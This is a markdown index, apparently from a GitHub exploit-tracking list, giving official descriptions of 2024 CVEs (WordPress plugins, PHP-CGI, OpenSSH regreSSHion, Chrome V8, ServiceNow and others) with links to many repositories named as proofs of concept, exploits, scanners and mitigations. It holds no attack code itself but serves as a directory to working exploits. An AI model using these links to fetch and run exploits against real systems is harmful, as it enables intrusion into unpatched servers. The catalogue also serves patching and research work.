- [Yogehi/cve-2024-4406-xiaomi13pro-exploit-files](https://github.com/Yogehi/cve-2024-4406-xiaomi13pro-exploit-files)

### CVE-2024-4439 (2024-05-03)

WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar.

- [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439)
- [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439)
- [xssor-dz/-CVE-2024-4439](https://github.com/xssor-dz/-CVE-2024-4439)
- [soltanali0/CVE-2024-4439](https://github.com/soltanali0/CVE-2024-4439)

### CVE-2024-4443 (2024-05-22)

The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc)

### CVE-2024-4484 (2024-05-24)

The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘xai_username’ parameter in versions up to, and including, 5.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

- [Abo5/CVE-2024-4484](https://github.com/Abo5/CVE-2024-4484)

### CVE-2024-4577 (2024-06-09)

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. The PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

- [TAM-K592/CVE-2024-4577](https://github.com/TAM-K592/CVE-2024-4577)
- [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577)
- [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577)
- [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577)
- [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577)
- [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577)
- [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577)
- [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template)
- [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577)
- [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577)
- [Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577)
- [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP)
- [BitMEXResearch/CVE-2024-4577](https://github.com/BitMEXResearch/CVE-2024-4577)
- [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei)
- [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577)
- [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577)
- [ZephrFish/CVE-2024-4577-PHP-RCE](https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE)
- [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE)
- [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577)
- [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577)
- [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT)
- [it-t4mpan/check_cve_2024_4577.sh](https://github.com/it-t4mpan/check_cve_2024_4577.sh)
- [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577)
- [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577)
- [aaddmin1122345/cve-2024-4577](https://github.com/aaddmin1122345/cve-2024-4577)
- [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577)
- [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis)
- [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE)
- [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577)
- [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577)
- [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577)
- [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577)
- [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE)
- [PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough](https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough)
- [ggfzx/CVE-2024-4577](https://github.com/ggfzx/CVE-2024-4577)
- [olebris/CVE-2024-4577](https://github.com/olebris/CVE-2024-4577)
- [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577)
- [charis3306/CVE-2024-4577](https://github.com/charis3306/CVE-2024-4577)
- [l0n3m4n/CVE-2024-4577-RCE](https://github.com/l0n3m4n/CVE-2024-4577-RCE)
- [bibo318/CVE-2024-4577-RCE-ATTACK](https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK)
- [waived/CVE-2024-4577-PHP-RCE](https://github.com/waived/CVE-2024-4577-PHP-RCE)
- [nNoSuger/CVE-2024-4577](https://github.com/nNoSuger/CVE-2024-4577)
- [a-roshbaik/CVE-2024-4577](https://github.com/a-roshbaik/CVE-2024-4577)
- [a-roshbaik/CVE-2024-4577-PHP-RCE](https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE)
- [Jcccccx/CVE-2024-4577](https://github.com/Jcccccx/CVE-2024-4577)
- [bughuntar/CVE-2024-4577](https://github.com/bughuntar/CVE-2024-4577)
- [fa-rrel/CVE-2024-4577-RCE](https://github.com/fa-rrel/CVE-2024-4577-RCE)
- [ywChen-NTUST/PHP-CGI-RCE-Scanner](https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner)
- [AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-](https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-)
- [phirojshah/CVE-2024-4577](https://github.com/phirojshah/CVE-2024-4577)
- [JeninSutradhar/CVE-2024-4577-checker](https://github.com/JeninSutradhar/CVE-2024-4577-checker)
- [longhoangth18/CVE-2024-4577](https://github.com/longhoangth18/CVE-2024-4577)
- [0xbd2/CVE-2024-4577](https://github.com/0xbd2/CVE-2024-4577)

### CVE-2024-4701 (2024-05-10)

A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18.

- [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC)

### CVE-2024-4761 (2024-05-14)

Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)

- [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761)

### CVE-2024-4875 (2024-05-21)

The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data or loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.

- [RandomRobbieBF/CVE-2024-4875](https://github.com/RandomRobbieBF/CVE-2024-4875)

### CVE-2024-4879 (2024-07-10)

ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

- [Brut-Security/CVE-2024-4879](https://github.com/Brut-Security/CVE-2024-4879)
- [bigb0x/CVE-2024-4879](https://github.com/bigb0x/CVE-2024-4879)
- [Mr-r00t11/CVE-2024-4879](https://github.com/Mr-r00t11/CVE-2024-4879)
- [zgimszhd61/CVE-2024-4879](https://github.com/zgimszhd61/CVE-2024-4879)
- [ShadowByte1/CVE-2024-4879](https://github.com/ShadowByte1/CVE-2024-4879)
- [Praison001/CVE-2024-4879-ServiceNow](https://github.com/Praison001/CVE-2024-4879-ServiceNow)
- [NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning](https://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning)
- [jdusane/CVE-2024-4879](https://github.com/jdusane/CVE-2024-4879)
- [fa-rrel/CVE-2024-4879](https://github.com/fa-rrel/CVE-2024-4879)
- [0xWhoami35/CVE-2024-4879](https://github.com/0xWhoami35/CVE-2024-4879)

### CVE-2024-4883 (2024-06-25)

In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe.

- [sinsinology/CVE-2024-4883](https://github.com/sinsinology/CVE-2024-4883)

### CVE-2024-4885 (2024-06-25)

In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUp Gold. The WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with `iisapppool\nmconsole` privileges.

- [sinsinology/CVE-2024-4885](https://github.com/sinsinology/CVE-2024-4885)

### CVE-2024-4898 (2024-06-12)

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.

- [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc)
- [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc)

### CVE-2024-4947 (2024-05-15)

Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

- [uixss/PoC-CVE-2024-4947](https://github.com/uixss/PoC-CVE-2024-4947)

### CVE-2024-4956 (2024-05-16)

Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.

- [banditzCyber0x/CVE-2024-4956](https://github.com/banditzCyber0x/CVE-2024-4956)
- [xungzzz/CVE-2024-4956](https://github.com/xungzzz/CVE-2024-4956)
- [erickfernandox/CVE-2024-4956](https://github.com/erickfernandox/CVE-2024-4956)
- [gmh5225/CVE-2024-4956](https://github.com/gmh5225/CVE-2024-4956)
- [ifconfig-me/CVE-2024-4956-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner)
- [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC)
- [yagyuufellinluvv/CVE-2024-4956](https://github.com/yagyuufellinluvv/CVE-2024-4956)
- [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956)
- [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956)
- [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager)
- [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956)
- [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956)
- [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956)
- [JolyIrsb/CVE-2024-4956](https://github.com/JolyIrsb/CVE-2024-4956)
- [UMASANKAR-MG/Path-Traversal-CVE-2024-4956](https://github.com/UMASANKAR-MG/Path-Traversal-CVE-2024-4956)
- [An00bRektn/shirocrack](https://github.com/An00bRektn/shirocrack)

### CVE-2024-5009 (2024-06-25)

In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password.

- [sinsinology/CVE-2024-5009](https://github.com/sinsinology/CVE-2024-5009)
- [th3gokul/CVE-2024-5009](https://github.com/th3gokul/CVE-2024-5009)

### CVE-2024-5084 (2024-05-23)

The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

- [KTN1990/CVE-2024-5084](https://github.com/KTN1990/CVE-2024-5084)
- [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084)
- [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084)
- [WOOOOONG/CVE-2024-5084](https://github.com/WOOOOONG/CVE-2024-5084)

### CVE-2024-5124 (2024-06-06)

A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the '=' operator in Python. This method of comparison allows an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could potentially guess user passwords, compromising the security of the system.

- [gogo2464/CVE-2024-5124](https://github.com/gogo2464/CVE-2024-5124)

### CVE-2024-5246 (2024-05-23)

NETGEAR ProSAFE Network Management System Tomcat Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Authentication is required to exploit this vulnerability.

The specific flaw exists within the product installer. The issue results from the use of a vulnerable version of Apache Tomcat. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22868.

- [Abdurahmon3236/CVE-2024-5246](https://github.com/Abdurahmon3236/CVE-2024-5246)

### CVE-2024-5274 (2024-05-28)

Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

- [Alchemist3dot14/CVE-2024-5274-Detection](https://github.com/Alchemist3dot14/CVE-2024-5274-Detection)
- [mistymntncop/CVE-2024-5274](https://github.com/mistymntncop/CVE-2024-5274)

### CVE-2024-5324 (2024-06-06)

The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.

- [RandomRobbieBF/CVE-2024-5324](https://github.com/RandomRobbieBF/CVE-2024-5324)

### CVE-2024-5326 (2024-05-30)

The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.

- [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc)
- [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc)

### CVE-2024-5356 (2024-05-26)

A vulnerability was found in anji-plus AJ-Report up to 1.4.1. It has been rated as critical. It affects an unknown part of the file /dataSet/testTransform;swagger-ui. Manipulation of the argument dynSentence with unknown data leads to a SQL injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [droyuu/Aj-Report-sql-CVE-2024-5356-POC](https://github.com/droyuu/Aj-Report-sql-CVE-2024-5356-POC)

### CVE-2024-5420 (2024-06-04)

Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web interface allows stored Cross-Site Scripting (XSS). This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below.

- [fa-rrel/CVE-2024-5420-XSS](https://github.com/fa-rrel/CVE-2024-5420-XSS)
- [K4yd0/CVE-2024-5420_XSS](https://github.com/K4yd0/CVE-2024-5420_XSS)

### CVE-2024-5522 (2024-06-20)

The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.

- [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc)
- [kryptonproject/CVE-2024-5522-PoC](https://github.com/kryptonproject/CVE-2024-5522-PoC)
- [geniuszlyy/CVE-2024-5522](https://github.com/geniuszlyy/CVE-2024-5522)

### CVE-2024-5633 (2024-07-09)

Longse model LBH30FE200W cameras, as well as products based on this device, provide unrestricted access for an attacker located in the same local network to an undocumented binary service CoolView on one of the ports.

An attacker with knowledge of the available commands is able to perform read/write operations on the device's memory, which might result in e.g. bypassing telnet login and obtaining full access to the device.

- [Adikso/CVE-2024-5633](https://github.com/Adikso/CVE-2024-5633)

### CVE-2024-5735 (2024-06-28)

Full Path Disclosure vulnerability in AdmirorFrames Joomla! extension in afHelper.php script allows an unauthorised attacker to retrieve location of web root folder. This issue affects AdmirorFrames: before 5.0.

- [afine-com/CVE-2024-5735](https://github.com/afine-com/CVE-2024-5735)

### CVE-2024-5736 (2024-06-28)

Server Side Request Forgery (SSRF) vulnerability in AdmirorFrames Joomla! extension in afGdStream.php script allows to access local files or server pages available only from localhost. This issue affects AdmirorFrames: before 5.0.

- [afine-com/CVE-2024-5736](https://github.com/afine-com/CVE-2024-5736)

### CVE-2024-5737 (2024-06-28)

Script afGdStream.php in AdmirorFrames Joomla! extension doesn’t specify a content type and as a result default (text/html) is used. An attacker may embed HTML tags directly in image data which is rendered by a webpage as HTML. This issue affects AdmirorFrames: before 5.0.

- [afine-com/CVE-2024-5737](https://github.com/afine-com/CVE-2024-5737)

### CVE-2024-5806 (2024-06-25)

Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass. This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2.

- [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806)

### CVE-2024-5932 (2024-08-20)

The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.

- [0xb0mb3r/CVE-2024-5932-PoC](https://github.com/0xb0mb3r/CVE-2024-5932-PoC)
- [EQSTLab/CVE-2024-5932](https://github.com/EQSTLab/CVE-2024-5932)
- [OxLmahdi/cve-2024-5932](https://github.com/OxLmahdi/cve-2024-5932)

### CVE-2024-5947 (2024-06-13)

Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.

- [Cappricio-Securities/CVE-2024-5947](https://github.com/Cappricio-Securities/CVE-2024-5947)

### CVE-2024-5961 (2024-06-14)

Improper neutralization of input during web page generation vulnerability in 2ClickPortal software allows reflected cross-site scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects 2ClickPortal software versions from 7.2.31 through 7.6.4.

- [kac89/CVE-2024-5961](https://github.com/kac89/CVE-2024-5961)

### CVE-2024-6028 (2024-06-25)

The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc)

### CVE-2024-6043 (2024-06-17)

A vulnerability was discovered in SourceCodester Best House Rental Management System 1.0. It has been rated as critical. This affects the function login of the file admin_class.php. Manipulation of the argument username with unknown data leads to a SQL injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [lfillaz/CVE-2024-6043](https://github.com/lfillaz/CVE-2024-6043)

### CVE-2024-6050 (2024-07-01)

Improper Neutralization of Input During Web Page Generation vulnerability in SOKRATES-software SOWA OPAC allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects SOWA OPAC software in versions from 4.0 before 4.9.10, from 5.0 before 6.2.12.

- [kac89/CVE-2024-6050](https://github.com/kac89/CVE-2024-6050)

### CVE-2024-6095 (2024-07-06)

A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.

- [Abdurahmon3236/-CVE-2024-6095](https://github.com/Abdurahmon3236/-CVE-2024-6095)

### CVE-2024-6205 (2024-07-19)

The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.

- [j3r1ch0123/CVE-2024-6205](https://github.com/j3r1ch0123/CVE-2024-6205)

### CVE-2024-6222 (2024-07-09)

In Docker Desktop before v4.29.0, an attacker who has gained access to the Docker Desktop VM through a container breakout can further escape to the host by passing extensions and dashboard related IPC messages.

Docker Desktop v4.29.0 https://docs.docker.com/desktop/release-notes/#4290 fixes the issue on MacOS, Linux and Windows with Hyper-V backend.

As exploitation requires "Allow only extensions distributed through the Docker Marketplace" to be disabled, Docker Desktop v4.31.0 https://docs.docker.com/desktop/release-notes/#4310 additionally changes the default configuration to enable this setting by default.

- [Florian-Hoth/CVE-2024-6222](https://github.com/Florian-Hoth/CVE-2024-6222)

### CVE-2024-6366 (2024-07-29)

The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.

- [Abdurahmon3236/CVE-2024-6366](https://github.com/Abdurahmon3236/CVE-2024-6366)

### CVE-2024-6386 (2024-08-21)

The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.

- [argendo/CVE-2024-6386](https://github.com/argendo/CVE-2024-6386)

### CVE-2024-6387 (2024-07-01)

A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.

- [zgzhang/cve-2024-6387-poc](https://github.com/zgzhang/cve-2024-6387-poc)
- [acrono/cve-2024-6387-poc](https://github.com/acrono/cve-2024-6387-poc)
- [lflare/cve-2024-6387-poc](https://github.com/lflare/cve-2024-6387-poc)
- [shyrwall/cve-2024-6387-poc](https://github.com/shyrwall/cve-2024-6387-poc)
- [getdrive/CVE-2024-6387-PoC](https://github.com/getdrive/CVE-2024-6387-PoC)
- [FerasAlrimali/CVE-2024-6387-POC](https://github.com/FerasAlrimali/CVE-2024-6387-POC)
- [passwa11/cve-2024-6387-poc](https://github.com/passwa11/cve-2024-6387-poc)
- [jack0we/CVE-2024-6387](https://github.com/jack0we/CVE-2024-6387)
- [xaitax/CVE-2024-6387_Check](https://github.com/xaitax/CVE-2024-6387_Check)
- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)
- [wiggels/regresshion-check](https://github.com/wiggels/regresshion-check)
- [3yujw7njai/CVE-2024-6387](https://github.com/3yujw7njai/CVE-2024-6387)
- [betancour/OpenSSH-Vulnerability-test](https://github.com/betancour/OpenSSH-Vulnerability-test)
- [zgimszhd61/cve-2024-6387-poc](https://github.com/zgimszhd61/cve-2024-6387-poc)
- [muyuanlove/CVE-2024-6387fixshell](https://github.com/muyuanlove/CVE-2024-6387fixshell)
- [TAM-K592/CVE-2024-6387](https://github.com/TAM-K592/CVE-2024-6387)
- [teamos-hub/regreSSHion](https://github.com/teamos-hub/regreSSHion)
- [Maikefee/CVE-2024-6387_Check.py](https://github.com/Maikefee/CVE-2024-6387_Check.py)
- [ahlfors/CVE-2024-6387](https://github.com/ahlfors/CVE-2024-6387)
- [Mufti22/CVE-2024-6387-checkher](https://github.com/Mufti22/CVE-2024-6387-checkher)
- [thegenetic/CVE-2024-6387-exploit](https://github.com/thegenetic/CVE-2024-6387-exploit)
- [R4Tw1z/CVE-2024-6387](https://github.com/R4Tw1z/CVE-2024-6387)
- [d0rb/CVE-2024-6387](https://github.com/d0rb/CVE-2024-6387)
- [CiderAndWhisky/regression-scanner](https://github.com/CiderAndWhisky/regression-scanner)
- [shamo0/CVE-2024-6387_PoC](https://github.com/shamo0/CVE-2024-6387_PoC)
- [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap)
- [SecWithMoh/CVE-2024-6387](https://github.com/SecWithMoh/CVE-2024-6387)
- [PrincipalAnthony/CVE-2024-6387-Updated-x64bit](https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit)
- [k4t3pr0/CVE-2024-6387-POC](https://github.com/k4t3pr0/CVE-2024-6387-POC)
- [daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook](https://github.com/daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook)
- [rumochnaya/openssh-cve-2024-6387.sh](https://github.com/rumochnaya/openssh-cve-2024-6387.sh)
- [zenzue/CVE-2024-6387-Mitigation](https://github.com/zenzue/CVE-2024-6387-Mitigation)
- [devarshishimpi/CVE-2024-6387-Check](https://github.com/devarshishimpi/CVE-2024-6387-Check)
- [hssmo/cve-2024-6387_AImade](https://github.com/hssmo/cve-2024-6387_AImade)
- [ACHUX21/checker-CVE-2024-6387](https://github.com/ACHUX21/checker-CVE-2024-6387)
- [AiGptCode/ssh_exploiter_CVE-2024-6387](https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387)
- [xristos8574/regreSSHion-nmap-scanner](https://github.com/xristos8574/regreSSHion-nmap-scanner)
- [xonoxitron/regreSSHion](https://github.com/xonoxitron/regreSSHion)
- [no-one-sec/CVE-2024-6387](https://github.com/no-one-sec/CVE-2024-6387)
- [dawnl3ss/CVE-2024-6387](https://github.com/dawnl3ss/CVE-2024-6387)
- [MrR0b0t19/CVE-2024-6387-Exploit-POC](https://github.com/MrR0b0t19/CVE-2024-6387-Exploit-POC)
- [th3gokul/CVE-2024-6387](https://github.com/th3gokul/CVE-2024-6387)
- [n1cks0n/Test_CVE-2024-6387](https://github.com/n1cks0n/Test_CVE-2024-6387)
- [l0n3m4n/CVE-2024-6387](https://github.com/l0n3m4n/CVE-2024-6387)
- [RickGeex/CVE-2024-6387-Checker](https://github.com/RickGeex/CVE-2024-6387-Checker)
- [xonoxitron/regreSSHion-checker](https://github.com/xonoxitron/regreSSHion-checker)
- [BrandonLynch2402/cve-2024-6387-nuclei-template](https://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template)
- [edsonjt81/CVE-2024-6387_Check](https://github.com/edsonjt81/CVE-2024-6387_Check)
- [grupooruss/CVE-2024-6387](https://github.com/grupooruss/CVE-2024-6387)
- [CognisysGroup/CVE-2024-6387-Checker](https://github.com/CognisysGroup/CVE-2024-6387-Checker)
- [sxlmnwb/CVE-2024-6387](https://github.com/sxlmnwb/CVE-2024-6387)
- [Symbolexe/CVE-2024-6387](https://github.com/Symbolexe/CVE-2024-6387)
- [harshinsecurity/sentinelssh](https://github.com/harshinsecurity/sentinelssh)
- [t3rry327/cve-2024-6387-poc](https://github.com/t3rry327/cve-2024-6387-poc)
- [jocker2410/CVE-2024-6387_poc](https://github.com/jocker2410/CVE-2024-6387_poc)
- [liqhtnd/sshd-logingracetime0](https://github.com/liqhtnd/sshd-logingracetime0)
- [JackSparrowhk/ssh-CVE-2024-6387-poc](https://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc)
